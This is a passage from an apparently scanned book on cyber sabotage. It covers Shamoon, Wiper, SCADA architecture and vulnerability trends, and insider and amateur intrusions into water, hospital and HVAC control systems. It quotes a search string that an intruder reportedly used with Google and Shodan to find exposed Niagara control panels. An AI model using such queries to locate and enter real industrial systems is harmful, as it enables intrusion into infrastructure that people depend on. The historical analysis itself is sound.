August in 2012. This time the attack became known as “Shamoon,” 
again because the anti-virus researchers who analyzed the software chose 
this name. That name, curiously, was taken from a folder name in one 
of the malware’s strings, 

C:\Shamoon\ArabianGulf\wiper\release\wiper.pdb 

Shamoon simply means “Simon” in Arabic. One initial and, as it 
turned out, wrong suspicion was that it could be related to the Sami 
Shamoon College of Engineering, Israel’s largest and most well-reputed 
engineering school. The malware came in the form of a small 900-kilo- 
byte file that included encrypted elements. It had three functional com¬ 
ponents: a dropper, to install additional modules; a wiper, responsible 
for deleting files; and a reporter, to relay details back to the software’s 
handlers. After the small file was introduced into a target network, most 
likely as an email attachment, it would spread via shared network 
connections to other machines on the same network. The software’s 
payload was designed to destroy data. It overwrote the segment of a hard 
drive responsible for rebooting the system as well as partition tables and 
most files with random data, including a small segment of an image that 
allegedly shows a burning American flag. 11 As a result of the software’s 
destructive capabilities, the US government’s computer emergency res¬ 
ponse team pointed out that “an organization infected with the malware 
could experience operational impacts including loss of intellectual pro- 
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perty and disruption of critical systems.” The US agency in charge of 
responding to computer emergencies also pointed out that the software’s 
destructive potential remained limited: “no evidence exists that Sha- 
moon specifically targets industrial control systems components or U.S. 
government agencies.” 12 There is equally no evidence that the software 
succeeded in disrupting critical systems—and this is the case despite its 
initial success. 

A previously unknown entity, the “Cutting Sword of Justice,” claimed 
credit for the attack against Saudi Aramco by pasting a poorly crafted 
message on Pastebin, a platform used by hackers to dump raided data in 
simple text form. First the attackers made clear what their intention was, 
aligning themselves with anti-oppression rebels in the countries affected 
by the Arab Spring: 

We, behalf of an anti-oppression hacker group that have been fed up of 
crimes and atrocities taking place in various countries around the world, 
especially in the neighboring countries such as Syria, Bahrain, Yemen, 
Lebanon, Egypt and ..., and also of dual approach of the world commu¬ 
nity to these nations, want to hit the main supporters of these disasters by 
this action. 

One of the main supporters of this disasters [sic] is Al-Saud corrupt regime 
that sponsors such oppressive measures by using Muslims oil resources. 
Al-Saud is a partner in committing these crimes. It’s [sic] hands are infec¬ 
ted with the blood of innocent children and people. 

With their motivation and their target set out, the Cutting Sword of 
Justice announced some initial action: 

In the first step, an action was performed against Aramco company, as the 
largest financial source for Al-Saud regime. In this step, we penetrated a 
system of Aramco company by using the hacked systems in several 
countries and then sended [sic] a malicious virus to destroy thirty thou¬ 
sand computers networked in this company. The destruction operations 
began on Wednesday, Aug 15, 2012 at 11:08 AM (Local time in Saudi 
Arabia) and will be completed within a few hours. 13 

This anonymous claim was most likely genuine. Symantec only lear¬ 
ned about the new malware after this message had been posted. The 
security firm confirmed that the timing of 11:08 a.m. was hard-wired 
into Shamoon, as announced on Pastebin. Two days later the hackers 
followed up with a separate post, publishing thousands of IP addresses 
which, they claimed, belonged to the infected computers. 14 Saudi 
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Aramco did not respond to those claims, but Symantec assumed that 
the addresses did indeed belong to the Saudi oil producer. 15 Aramco 
later confirmed that the number of infected computers was 30,000, as 
claimed by the Cutting Sword of Justice. The attacks remained targe¬ 
ted, with probably less than fifty separate infections worldwide, most 
of them inconsequential. RasGas of Qatar, also one of the world’s 
largest exporters of natural gas, was the second victim and was more 
seriously affected. 

Shamoon was focused on the energy sector; it was designed to destroy 
data, and it even contained a reference to “wiper” in the above-quoted 
string. So was Shamoon in fact that mysterious Wiper? After all, like 
Saudi Arabia, the Iranian regime was highly unpopular with anti¬ 
government activists and rebels across the Arab world. The answer, 
however, is most likely “no.” Kaspersky Lab, which did the most detailed 
research into Wiper, pointed out that the deletion routine is different 
and that the hacker group’s attack against Saudi Aramco used different 
filenames for its drivers. Perhaps most notably, the politico-hackers 
made some programming errors, including a crude one. They wanted 
Shamoon to start thrashing Saudi files on 15 August 2012, 08:08 
UTC—but their date-checking routine contained a logical flaw: the 
software’s date-testing query would return the order to attack even when 
it should not, in any year after 2012 provided the month and time was 
before 15 August. February 2013, for instance, would therefore qualify 
as being before 15 August 2012. To the developers at Kaspersky Lab, 
this mistake was additional proof that Shamoon was a copy-cat attack 
by far less sophisticated hacktivists, and not a follow-on attack by the 
highly professional developers that had written Wiper or even Stuxnet; 
“experienced programmers would hardly be expected to mess up a date 
comparison routine,” wrote Dmitry Tarakanov, one of Kaspersky’s ana¬ 
lysts. 16 It remains unclear precisely how Shamoon’s authors managed to 
breach Saudi Aramco’s networks. 

Another case of Middle Eastern cyber sabotage is equally instructive. 
At the end of April 2012, a new and rather mysterious piece of malware 
appeared. Alireza Nikzad, a spokesman for the Iranian oil ministry, 
confirmed that an attack on data systems had taken place. Probably as a 
precaution, Iran took its main Persian Gulf oil terminals off the Inter¬ 
net. But Nikzad stressed that the attackers had failed to damage or des¬ 
troy data: 
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This cyber attack has not damaged the main data of the oil ministry and 
the National Iranian Oil Company (NIOC) since the general servers are 
separate from the main servers, even their cables are not linked to each 
other and are not linked to internet service ... We have a backup from all 
our main or secondary data, and there is no problem in this regard . 17 

The malware posed an unusual problem to its victims and those 
trying to understand the new threat: the software was designed to delete 
not only files on the attacked computer networks, but also itself and all 
traces of the attack. Consequently, no samples of the malware had been 
available for analysis. For months, leading anti-virus companies were 
unable to find Wiper, prompting some outside observers to question the 
veracity of news reports about yet another Iran-bashing cyber attack. 
But Kaspersky Lab, the Russian software security firm that seems to be 
especially popular in countries that harbor suspicions against private 
American security companies, established some facts. The Russian firm 
was able to obtain “dozens” of hard drive images from computer systems 
that had been attacked by Wiper, presumably from some of its Iranian 
customers, either directly or with help from Russian state intelligence. 
A hard drive image is an exact copy of an entire hard drive at a given 
moment. Kaspersky Lab was able to confirm that the attack indeed took 
place in the last ten days of April 2012. 18 The designers of the attack had 
two priorities: the first was destroying data as efficiently as possible. 
Deleting the full contents of a large storage device, such as a hard drive 
several hundred gigabytes in size, can take a long time, up to several 
hours, depending on the capacity of the processor and other technical 
characteristics. So the attackers decided to craft a wiping algorithm that 
prioritized speed. 

The attackers’ second priority was stealth. Wiper’s creators, Kaspersky 
Lab pointed out, “were extremely careful to destroy absolutely every 
single piece of data which could be used to trace the incidents.” Yet in 
some cases traces did remain. Some of the attacked systems were able to 
recover a copy of the Windows registry hives, parts of a computer’s 
underlying master database that are saved in separate files on the hard 
disk. On some of the systems analyzed by Kaspersky Lab, Wiper deleted 
all .PNF files in a specific Windows folder where important system files 
are stored (the INF folder). It deleted those files with a higher priority 
than other files on the system. The researchers suspected that Wiper kept 
its own main body in that folder as an encrypted .PNF file. Other 
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sophisticated cyber attacks, notably Stuxnet and Duqu, also stored most 
of their primary files in PNF, something that is uncommon for malware. 
The rationale, the Russian experts reasoned, was that Wiper would wipe 
itself and all its malware components first, and only then proceed to 
delete other targeted files, including the system files that would ultima¬ 
tely crash the system. If Wiper had started deleting system files randomly, 
the chances would be significant that it would “forget” to delete itself on 
some machines before the operating system crashed, thus conserving all 
non-deleted files on the hard drive, leaving forensic traces of the malware 
itself behind. But this particular malware was so expertly written that no 
data survived in each instance where it was activated. Although Kas¬ 
persky Lab has seen traces of infections, the malware itself remains 
unknown, as is the software’s targeting priority. Who the attacker was, 
and how many victims got hit, remains a matter of speculation. 

Both Shamoon and Wiper had one critical limitation. They targeted 
large energy companies, companies that move vast quantities of oil and 
gas. Yet production and logistics remained unaffected by the attacks. The 
business network was hit, but not the industrial control network that 
made sure the crucial combustible fossil fuel was still pumped out of the 
ground and into pipelines and tankers. In December 2012, Saudi Aram- 
co’s forensic investigation into Shamoon brought to light the fact that 
the attackers had tried for a full month to disrupt the industrial control 
systems that manage the company’s oil production, “The main target in 
this attack was to stop the flow of oil and gas to local and international 
markets,” said Abdullah al-Saadan, the firm’s vice-president for corporate 
planning. 19 The attack on the SCADA network was unsuccessful. More 
serious sabotage has to overcome this limitation. 

Successful attacks on industrial control systems that cause physical 
damage are very rare, but real. Sabotage, which dates back to industrial 
confrontations in the late nineteenth century, is again going industrial 
in the digitized twenty-first century: today’s most formidable targets are 
industrial control systems, also known as systems in charge of Supervi¬ 
sory Control and Data Acquisition. Such systems are used in power 
plants, the electrical grid, refineries, pipelines, water and wastewater 
plants, trains, underground transportation, traffic lights, heat and 
lighting in office buildings and hospitals, elevators, and many other 
physical processes. An alternative abbreviation that is sometimes used is 
DCS, which stands for Distributed Control Systems. DCS tend to be 
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used to control processes in smaller geographical areas, such as factory 
floors, whereas SCADA systems can span entire regions, for instance in 
the case of pipelines or transportation grids. Both are subsets of Indus¬ 
trial Control Systems, or ICS. Attacking an industrial control system is 
the most probable way for a computer attack to create physical damage 
and indirectly injure or kill people. 

Although “Supervisory control and data acquisition” sounds compli¬ 
cated, the earliest control networks were actually made up of a simple 
monitoring device, say a meter with a switch, and remote sensors and 
actuators: if the temperature in a factory tank a mile away dropped 
below 100 degrees, for instance, the operator would remotely switch on 
the boiler. As industrial production became more complex, so did the 
computerized control networks. Yet most industrial control systems have 
basic design features in common, be they oil refineries, electrical power 
stations, steel plants, chemical factories, or water utilities. To understand 
the potential of sabotage against SCADA systems, some of these basics 
are important. 

The first part, at least from the point of view of the operator, is the 
so-called human-machine interface, often abbreviated as HMI. The com¬ 
munity of engineers specialized in SCADA systems commonly use 
shorthand, and their analysis is hard to penetrate without knowing at 
least some of the jargon. Plant operators or maintenance personnel 
would mostly control the system through that interface. In modern 
systems the HMI is in effect a large screen showing a mimic of a plant 
or large apparatus, with small images perhaps showing pipes and joints 
and tanks, equipped with bright lights and small meters that would 
allow the operator to get readings on critical values, such as pressures 
and speeds. If a certain parameter requires action, a light may start blin¬ 
king red or a meter may indicate a potential problem. A second compo¬ 
nent is the supervisory computer system. This is the system’s brain. The 
supervisory computer is able to gather data and respond by sending 
commands back to field devices to control the process. Field devices may 
be on the plant floor, or actually and quite literally in the field, such as 
a pipeline network that spans large distances outdoors. In simpler sys¬ 
tems, so-called Programmable Logic Controllers (PLCs) can replace a 
more complex supervisory computer system. Control systems and PLCs 
are so-called “master devices.” The third set of components are Remote 
Terminal (or Telemetry) Units, known as RTUs in the industry jargon. 
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These are “slave devices” which carry out orders from their masters. 
These devices would sit close to motors or valves that need to be control¬ 
led. RTUs act in both directions; they transmit sensor data to the 
control system and transmit orders from the supervisory system to 
remote motors and valves. 

All SCADA systems require a communication infrastructure. This 
communication infrastructure can be complex and costly, especially for 
systems that are geographically spread out over a wider area. Distances 
can be significant in the case of pipeline networks, water grids, and large 
chemical plants. Some industrial plants have to withstand extreme tem¬ 
peratures generated in the production process, electro-magnetic radia¬ 
tion, or rugged environmental conditions. The requirements for the 
communication hardware are not only rough but also diverse, because 
the industrial applications are so diverse. The companies that produce 
components for SCADA networks have therefore developed approxima¬ 
tely 200 proprietary protocols, often individually. Lor a long time, this 
diverse and somewhat chaotic situation made it difficult for attackers to 
penetrate and understand a particular control network. A SCADA 
network is often connected to a company’s business network through 
special gateways. Enabling data-links between the business network and 
automated production processes enables increased efficiency, better sup¬ 
ply management, and other benefits. Such gateways provide an interface 
between IP-based networks, such as a company’s business network or 
the open Internet, and the simpler, fieldbus protocol-based SCADA 
network that controls field devices. 20 Sometimes, especially in large 
networks like electricity grids, there may be unexpected links to the 
outside world such as phone connections or open channels for radio 
communication. SCADA networks are often old legacy systems, and as 
a result of complexity and staff turnover no single person may be able to 
understand the full reaches of the network. A large but ultimately 
unknown number of SCADA systems are connected to the Internet, 
also possibly without their operators’ awareness. 21 

Three trends are making SCADA systems potentially more vulnerable. 
The first trend is standardization in communication protocols. Increasing 
efficiency at minimum costs also creates pressures for the operators of 
control systems. In a dynamic that is comparable to open-source soft¬ 
ware, open protocol standards create significant gains in efficiency. But 
they also make the systems more vulnerable overall. “The open standards 
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make it very easy for attackers to gain in-depth knowledge about the 
working of these SCADA networks,” one research paper pointed out in 
2006. 22 One possibility, for instance, is that an attacker, once the 
network is penetrated, could observe and “sniff” communications on a 
network. Once malicious actors have learned more about the data and 
control commands, they could utilize their new knowledge to tamper 
with the operation. In some ways this is precisely what Stuxnet did. 

The second trend that is making industrial control systems more 
vulnerable to outside attack is an increase in connectivity. Technically, 
SCADA communication systems used to be organized as point-to-mul- 
tipoint “serial” communications over various channels, for example 
phone lines or private radio systems. But increasingly the communica¬ 
tion within a SCADA system relies on Internet Protocols. This means 
that terminal servers are increasingly set up to convert serial asynchro¬ 
nous data (i.e. bit- or byte-oriented data) into IP or “frame relay packets” 
for transmission in upgraded systems. This change brings many benefits. 
Maintenance of devices becomes easier when these devices are easy to 
connect to, both from a company’s business network, which connects 
air-conditioned office space in headquarters with noisy factory floors, 
and from the wider Internet, which is often the bridge to contractors 
and complex supply chains. This trend is amplified by the push for smart 
grids, which can save money by automatically moving peak production 
to times of cheap energy prices. Telvent is a leading industrial automa¬ 
tion company, valued at $2bn, and a subsidiary of the giant Schneider 
Electric, a French international firm that employs 130,000 people 
worldwide. One of Telvent’s main smart grid products, OASyS, is speci¬ 
fically designed to bridge the gap between an energy firm’s enterprise 
network and its activities in the field that are run by older legacy systems. 
In the fall of 2012, Telvent reported that attackers had installed mali¬ 
cious software and stolen project files related to Oasys. 23 The intruders 
were likely to have been members of the possibly Shanghai-based “Com¬ 
ment Group,” a large-scale cyber espionage operation allegedly linked to 
the Third Department of the People’s Liberation Army of China. 24 

A third trend is more visibility. Search technology has made many 
things far easier to find, and this includes previously hard to get manuals 
from PLC manufacturers which may occasionally even contain hard¬ 
coded login credentials. But the biggest change in visibility is probably 
due to one private programmer. In 2009, the then 26-year-old John 
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Matherley started operating a search engine for all sorts of devices 
connected to the Internet. Shodanhq.com boasts of listing: “Webcams. 
Routers. Power Plants. iPhones. Wind Turbines. Refrigerators. VoIP 
Phones.” 25 The platform has been dubbed the Google for hackers. Its 
search functionality offers to find computers based on software, geogra¬ 
phy, operating system, IP address, and other variables. Shodan’s crawlers 
scan the Internet for the ports usually associated with mainstream pro¬ 
tocols such as HTTP, PTP, SSH, and Telnet. On 28 October 2010, the 
US Department of Homeland Security warned that the resources to 
identify control systems openly connected to the Internet have been 
greatly reduced. The ICS-CERT alert pointed out that there was an 
“increased risk” posed by Shodan’s growing database. 26 In June of the 
following year, Eireann Leverett, a computer science student at Cam¬ 
bridge University, finished his MPhil dissertation. Using Shodan, Leve¬ 
rett had found and mapped 10,358 Internet-facing industrial control 
systems, although it remained unclear how many of them were in wor¬ 
king condition. Yet, remarkably, only 17 per cent of all systems, Leverett 
found, required a login authentification. When Leverett presented his 
findings at the S4 conference, a special event for control system specia¬ 
lists, many were surprised and even shocked. Some vendors started using 
Shodan to notify customers whose systems they would find online. One 
attendee who worked for Schweitzer, a PLC manufacturer, admitted the 
ignorance of some operators: “At least one customer told us ‘We didn’t 
even know it was attached’,” he told Wired magazine. 27 

Yet the picture would not be complete without acknowledging the 
counter-trends. SCADA systems are not only becoming more vulne¬ 
rable, but are also subject to several trends that make them less vulne¬ 
rable. The question of security becomes a question of balance. And it 
may only be possible to answer that question in a case-by-case analysis. 
For the following three reasons industrial control systems may be getting 
safer, not more vulnerable. These reasons may also help explain why the 
world, by the end of 2012, had still not witnessed a destructive cyber 
attack that actually injured or killed human beings. 

The first reason is closely related to more visibility: improved over¬ 
sight and red-teaming. A red team, an expression common in national 
defense as well as in computer security, refers to a group of mock adver¬ 
saries with the task of trying to test and expose an organization’s or a 
plan’s flaws and weaknesses. On 12 December 2011, for instance, a 
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29-year-old independent European researcher, Ruben Santamarta, blog¬ 
ged 28 about his discovery of a flaw in the firmware of one of Schneider’s 
programmable logic controllers, more precisely the so-called NOE 771 
module. The module contained at least fourteen hard-coded passwords, 
some of which were apparently published in support manuals. Before 
Santamarta published the vulnerabilities, he had informed the US 
government’s computer emergency response team in charge of control 
systems. ICS-CERT promptly reacted. On the same day, Elomeland 
Security published an alert pointing to the new vulnerability, and coor¬ 
dinated with Schneider Electric “to develop mitigations.” 29 Santamarta’s 
hack effectively resulted in considerable pressure on Schneider to fix the 
problem. A better-known white-hat PLC hacker is Dillon Beresford. 
White-hat is jargon for ethical hackers whose goal is to improve security, 
as opposed to black-hats who seek to exploit security flaws. Beresford, a 
researcher with little previous experience in control systems, uncovered 
critical vulnerabilities in the Siemens Simatic S7 programmable logic 
controllers, a widely used product. 30 The security analyst at NSS Labs 
gained recognition among control system experts when Siemens and the 
US Department of Homeland Security requested that he cancel his 
presentation on newly discovered Siemens S7 vulnerabilities scheduled 
at a hacker conference in Dallas in May 2011, TakeDownCon. 31 A num¬ 
ber of harmless but high-profile SCADA breaches in the past years have 
also contributed to a sense of alarm in the control system community. A 
third example is Justin Clarke’s exposures of vulnerabilities in Rugged- 
Corn’s products, which were also highlighted by an ICS-CERT alert. 32 
The pressure on the vendors kept mounting. 

The second reason, partly a result of the first, is slowly improving 
vendor security. There are dozens of companies that produce Program¬ 
mable Logic Controllers, but the worldwide market is dominated by 
only a few companies, with Siemens covering more than 30 per cent, 
Rockwell Automation just over 20 per cent, Mitsubishi at about 14 per 
cent, and Schneider Electric just under 10 per cent. Specific applications 
tend to be in the hands of specific vendors. Refineries, for instance, use 
mostly Honeywell, Emerson, and Yokogawa products. 33 Some of these 
manufacturers have a highly problematic track record in fixing flaws. 
Various critics had been pointing out for years, for instance, that Sie¬ 
mens had failed to remove critical vulnerabilities in its Simatic Step 7 
and Simatic PCS 7 software. A bug in the software enabled attackers to 
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inject a malicious dynamic-link library, a .dll file, into an unprotected 
Step 7 project folder. Stuxnet exploited this type of flaw to destroy the 
centrifuges in Natanz. Among the most prominent critics were Ralph 
Langner, a German engineer and early Stuxnet detective, 34 as well as 
Dale Peterson’s team at Digital Bond, a leading consultancy on indus¬ 
trial control systems. 35 Digital Bond runs an active blog and one of the 
industry’s most highly reputed conferences, the yearly S4 conference in 
Miami Beach. Peterson is feared by many in the control system industry 
for publishing far too many unpleasant details on systems that are inse¬ 
cure by design. But, he says, “we publish probably only about 10 per 
cent of what we find.” 36 After years of pressure, Siemens and other PLC 
vendors seem to have started responding and improving the security of 
their products, albeit still far too slowly. 

The final reason is continued, and possibly increasing, obscurity. Des¬ 
pite open protocols, more connectivity, and better documentation 
through a new search engine focused on hidden Internet-facing devices, 
the obscurity of systems remains a huge hurdle for successful outside 
attacks (but not for inside attackers). Merely gaining access to a system 
and even sniffing it out may not be enough to prepare a sophisticated 
attack, especially in highly complex industrial production processes. 
“You don’t have the human machine interface so you don’t really know 
what the PLC is plugged into,” explained Reid Wightman, a well-known 
expert on industrial control systems. “I really don’t know if the [device] 
is a release valve, an input valve, or a lightbulb.” Superb intelligence is 
needed for success, and possibly even test-flying the attack agent in an 
experimental setup that resembles the original target as closely as pos¬ 
sible. Something like this is hard to design, as Stuxnet demonstrated. As 
production systems become more complex, and often more bespoke, 
their obscurity may increase rather than decrease. 

The most effective saboteur has always been the insider—a feature 
that remains as true in the twenty-first century as it did in the 1910s. If 
anything, computer sabotage has empowered the outsider vis-a-vis the 
inside threat, although the most violent acts of computer sabotage 
remain inside jobs. The reason is simple. The best-placed person to 
damage a machine is the engineer who built it or maintains it, the 
manager who designed and runs a production process, or the IT admi¬ 
nistrator who adapted or installed a software solution. It therefore comes 
as no surprise that sabotage manuals tend to be written largely for insi- 
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ders, and this insight seems to apply to French anarchists as well as to 
American spies: in 1900, the bulletin of Montpellier’s Bourse de Travail 
was meant to be applied on the job, by the very factory workers best 
placed to monkeywrench the appliances of their despised capitalist 
bosses. In 1944, the OSS’s Simple Sabotage Field Manual also hoped to 
assist privy personnel in devising methods that would cause dithering, 
delay, distress, and destruction, from telegraph operators to railway engi¬ 
neers. In the context of cyber attacks, the insider threat is especially 
pertinent for complex SCADA systems. Engineers and administrators 
who work for a power plant or utility company know the systems best. 
They have the high degree of process knowledge that is required to 
mount an effective attack against bespoke legacy systems. If there is a 
risk of somebody secretly installing “logic bombs” that could be timed 
or activated from afar, it is the insider that poses the greatest risk. 

The saboteurs’ long-standing emphasis on inside knowledge has a 
problematic flipside, both for those trying to sabotage and for those 
trying to defend against sabotage: the most effective acts of industrial 
incapacitation require supreme access, supreme skill, and supreme intel¬ 
ligence regarding the target. As systems become more complex and 
arcane, the knowledge required to fiddle with them also becomes more 
complex and arcane. The result is a tenuous security advantage for the 
defender. Security engineers in computer science even have a technical 
term for this double-edged sword, “security-by-obscurity.” “There is no 
security-by-obscurity” is a popular pejorative phrase among computer 
scientists. It goes back to Auguste Kerckhoffs, a nineteenth-century 
Parisian cryptographer and linguist. A core assumption broadly held in 
cryptography, known as Kerckhoffs’s Principle, is widely considered 
incompatible with the idea of securing a system by obscuring knowledge 
about how to attack it. 37 Kerckoffs’s idea holds that a cryptosystem must 
be secure even if that system’s design—except the encryption key—is 
public knowledge. It is therefore no surprise that the notion of security- 
by-obscurity is looked down upon by leading cryptographers. Yet the 
relationship between security and obscurity is more complicated outside 
the narrow remit of cryptographers. 38 For engineers in charge of indus¬ 
trial control systems, security-by-obscurity is a fact of life, even if they 
don’t like the idea in theory. 39 

Yet the debate about the pros and cons of security-by-obscurity misses 
one central point: the insider. Claude Shannon, an American pioneer in 
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information theory, famously reformulated Kerckhoffs’s Principle as 
“The enemy knows the system.” For Shannon this statement was a theo¬ 
retical assumption that may be true in exceptional cases, rather than 
being a factual statement. The situation is different for the saboteur who 
is already on his target’s payroll. The insider actually knows the system. 
And the insider may be that enemy. The most successful sabotage ope¬ 
rations by computer attack, including Stuxnet and Shamoon, allegedly 
relied on some form of inside support. Precisely what that inside support 
looked like remains unclear in both cases. Yet in other cases it is better 
documented. Three examples will illustrate this. 

In early 2000, Time magazine reported two years after the fact that 
the Russian energy giant Gazprom had suffered a serious breach as a 
result of an insider. A disgruntled employee, Russian officials allegedly 
told Time, helped “a group of hackers” penetrate the company’s business 
network and “seize” Gazprom’s computers for several hours. The intru¬ 
ders could allegedly control even the SCADA systems that monitor and 
regulate the gas flow through the company’s vast network of pipelines. 
Executives in the politically well-connected firm were reportedly furious 
when the information was made public. Fearing embarrassment, Gaz¬ 
prom denied reports of the incident in the Russian press. “Pleads rolled 
in the Interior Ministry after the newspaper report came out,” Time 
quoted another senior official. “We were very close to a major natural 
disaster.” 40 A small natural disaster happened as a result of a successful 
breach a few years later. 

The second example occurred in March and April 2000 in the Shire 
of Maroochy, on Queensland’s Sunshine Cost in Australia. The Maroo- 
chy incident is one of the most damaging breaches of a SCADA system 
to have ever taken place. After forty-six repeated wireless intrusions into 
a large wastewater plant over a period of three months, a lone attacker 
succeeded in spilling more than a million liters of raw sewage into local 
parks, rivers, and even the grounds of a Hyatt Regency hotel. The author 
of the attack was 49-year-old Vitek Boden. His motive was revenge; the 
Maroochy Shire Council had rejected his job application. 41 At the time 
Boden was an employee of the company that had installed the Maroo¬ 
chy plant’s SCADA system. The Australian plant’s system covered a wide 
geographical area and radio signals were used to communicate with 
remote field devices, which start pumps or close valves. And Boden had 
the software to control the management system on his laptop and the 
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knowledge to operate the radio transmitting equipment. This allowed 
him to take control of 150 sewage pumping stations. The attack resulted 
in hundreds of thousands of liters of raw sewage being pumped into 
public waterways. The Maroochy Shire Council’s clean-up work took 
one week and cost $13,000, plus an additional $176,000 to update the 
plant’s security. “Vitek Boden’s actions were premeditated and systema¬ 
tic, causing significant harm to an area enjoyed by young families and 
other members of the public,” said Janelle Bryant at the time, the inves¬ 
tigations manager at the Queensland Environmental Protection Agency. 
“Marine life died, the creek water turned black and the stench was 
unbearable for residents.” 42 Boden was eventually jailed for two years. 43 

Another, lesser-known ICS insider attack happened in early 2009 in 
a Texas hospital, the W.B. Carrell Memorial Clinic in Dallas. The inci¬ 
dent did not cause any harm, but resulted in a severe criminal convic¬ 
tion. A night guard at the hospital, Jesse William McGraw, had managed 
to hack Carrell’s Heating, Ventilation and Air Conditioning (HVAC) 
system as well as a nurse’s computer that contained confidential patient 
information. McGraw then posted online screenshots of the compro¬ 
mised HVAC system and even brazenly published a YouTube video that 
showed him installing malware on the hospital’s computers that made 
the machines slaves for a botnet that the twenty-five-year-old operated. 
McGraw used the moniker “GhostExodus” and proclaimed himself the 
leader of the hacking group “Electronik Tribulation Army,” which he 
envisioned as a rival of Anonymous. In the early hours of 13 February 
2009, the night guard-turned-hacker physically accessed the control 
system facility for the clinic’s ventilation system without authorization, 
inserted a removable storage device, and ran a program that allowed him 
to emulate a CD/DVD drive. McGraw could have caused significant 
harm: “The HVAC system intrusion presented a health and safety risk 
to patients who could be adversely affected by the cooling if it were 
turned off during Texas summer weather conditions,” the FBI’s Dallas 
office argued, although summer was still a few months off. 44 But hospi¬ 
tal staff had reportedly experienced problems with the air conditioning 
and ventilation system, wondering why the alarm did not go off as pro¬ 
grammed. McGraw’s screenshots revealed that the alarm notification in 
the hospital’s surgery center had indeed been set to “inactive.” 45 In 
March 2011, two years after his offense, McGraw was sentenced to 110 
months in federal prison. 46 
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A further, most curious insider incident occurred on 17 November 
2011. Joe Weiss, a security consultant working in the control systems 
industry, published a blog post, “Water System Hack—The System Is 
Broken.” Weiss alleged that an intruder from Russia had hacked into an 
American water utility, stole customer usernames and passwords, and 
created physical damage by switching the system on-and-off until the 
water pump was burned out. Minor glitches were observed for two to 
three months, Weiss wrote, which were then identified as a malicious 
cyber attack. 47 Weiss’s information seems to have been based on a leaked 
report by the Illinois Statewide Terrorism and Intelligence Center, which 
was based on raw and unconfirmed data. 48 The Washington Post covered 
the story and identified the alleged attack as the first foreign SCADA 
attack against a target in the United States, the Curran-Gardner 
Townships Public Water District in Springfield, Illinois. “This is a big 
deal,” Weiss was quoted in the paper, “It was tracked to Russia. It has 
been in the system for at least two to three months. It has caused 
damage.” 49 The article did not ask why anybody in Russia would attack 
a single random water plant in the Midwestern United States. The PBI 
and the Department of Homeland Security started investigating the 
incident in Springfield and quickly cautioned against premature conclu¬ 
sions. One week later the facts were established. A contractor working 
on the Illinois water plant was traveling in Russia on personal business 
at the time and remotely accessed the plant’s computer systems. The 
information was not entirely wrong: the plant had a history of malfunc¬ 
tion, a pump failed, and somebody from an IP address in Russia 
accessed the system. Yet the incident and the misunderstanding illustrate 
several things: it shows how malicious intention and activity would turn 
an accident into an attack—but in the case of the contractor logging 
into the Springfield water plant from Russia that malicious intent was 
absent. The incident also shows how urban legends about successful 
SCADA attacks are created. The problem of false ICS attacks is so com¬ 
mon that the British Columbia Institute of Technology’s Industrial 
Security Incident Database used to have a separate category for “Hoax/ 
Urban Legend.” 50 

But it turned out to be premature and dangerous to dismiss the risk 
of a devastating attack against critical infrastructure and utility compa¬ 
nies, as one hacker demonstrated in the aftermath of the Springfield 
water hack story. One reader of the British IT news site The Register 
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was so incensed by the statement of a government official that he 
decided to take action. “My eyes were drawn, nary, pulled, to a particu¬ 
lar quote,” the angry hacker wrote in a Pastebin post a day later. One 
US Department of Homeland Security official had commented that, 
“At this time there is no credible corroborated data that indicates a risk 
to critical infrastructure entities or a threat to public safety.” 51 This sta¬ 
tement was highly controversial, even naive, especially as it came from 
an official. “This was stupid. You know. Insanely stupid. 1 dislike, 
immensely, how the DHS tend to downplay how absolutely fucked the 
state of national infrastructure is.” 52 So he decided to prove the govern¬ 
ment wrong by showing how bad the situation actually is. Using the 
handle prOf, the angry reader proceeded to penetrate into the human- 
machine interface software of a SCADA system used by a water plant in 
South Houston, which serves 16,000 Texans with water. With the help 
of the public Shodan search engine that looks for fingerprints of 
SCADA systems online, prOf allegedly found that the plant in South 
Houston was running the Siemens Simatic HM1 software, connected to 
the Internet, and protected by a simple three-character password. The 
twenty-two-year-old unemployed hacker then made five screenshots of 
the human-machine interface and posted links to the files on Pastebin. 
The break-in took barely ten minutes. PrOf did not do any damage and 
did not expose any details that could make it easy for malicious hackers 
to do damage, expressing his dislike of vandalism. The still unknown 
intruder allegedly favors hoodie sweatshirts and lives in his parents’ 
home somewhere overseas. 53 The city of South Houston upgraded its 
water plant to the Siemens system long before 11 September 2001, 
before the debate about industrial control systems as targets had caught 
on. “Nobody gave it a second thought,” Mayor Joe Soto told The 
Washington Post. “When it was put in, we didn’t have terrorists.” Soto 
knew that prOf had chosen his target more or less randomly. “We’re 
probably not the only one who is wide open,” the mayor said later, “He 
caught everyone with our pants down.” 54 

A comparable incident occurred over February and March 2012. One 
or multiple users from unauthorized IP addresses accessed the ICS 
network of an unidentified New Jersey air conditioning company, accor¬ 
ding to a memo published by the FBI. 55 The intruders used a backdoor 
to access the company’s Tridium Niagara system, enabling them to 
control the system remotely. It is not known if the intruders actually 
changed the system settings or caused any damage. But they could have 
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caused damage. The Niagara AX framework is installed on over 300,000 
systems worldwide in applications such as energy management, building 
automation, telecommunications, including heating, fire detection, and 
surveillance systems for the Pentagon, the FBI, and America’s Internal 
Revenue Service. 56 In the case of the New Jersey AC company, the intru¬ 
der was able to access a “Graphical User Interface, which provided a 
floor plan layout of the office, with control fields and feedback for each 
office and shop area,” the FBI reported. “All areas of the office were 
clearly labeled with employee names or area names.” The incident could 
be traced back to two messages on Pastebin from January 2012. 57 A user 
with the Twitter handle @ntisec, for “anti-security,” had posted a list of 
IP addresses, one of which led to the unidentified company. @ntisec 
identified himself as an “anarcho-syndicalist” who sympathized with 
Anonymous. Fie found the vulnerability through Google and Shodan 
by searching for “:|slot:/,” he reported. @ntisec seemed surprised by the 
ease with which he could get to various meter readings and control 
panels online: 

Don’t even need an exploit to get in here. Don’t even have to be a hacker. 
No passwords what so ever. 

So how is the state of your other #SCADA systems like your electrical 
grid? Or traffic management? 

What about chemical industry? Or can hackers switch some stuff that 
sends trains to another fail ? 58 

Yet the anarcho-syndicalist seemingly didn’t want to live up to his 
declared ideology, explicitly warning fellow amateur hackers not to do 
anything illegal, or, as it were, anarchical: 

Be careful and don’t cause rampant anarchy. They might trace you and I 
have warned you not to alter control states. Just have a look around to see 
[for] yourself how these systems affect our everyday life . 59 

The unidentified intruders apparently did exactly that: using @ntisec’s 
public backdoor URL to gain administrator-level access to the compa¬ 
ny’s industrial control systems—no firewall to breach, no password 
required, as the FBI noted. It is unclear if the hackers also took @ntisec’s 
advice and didn’t alter the system’s control states. Either way, it seems 
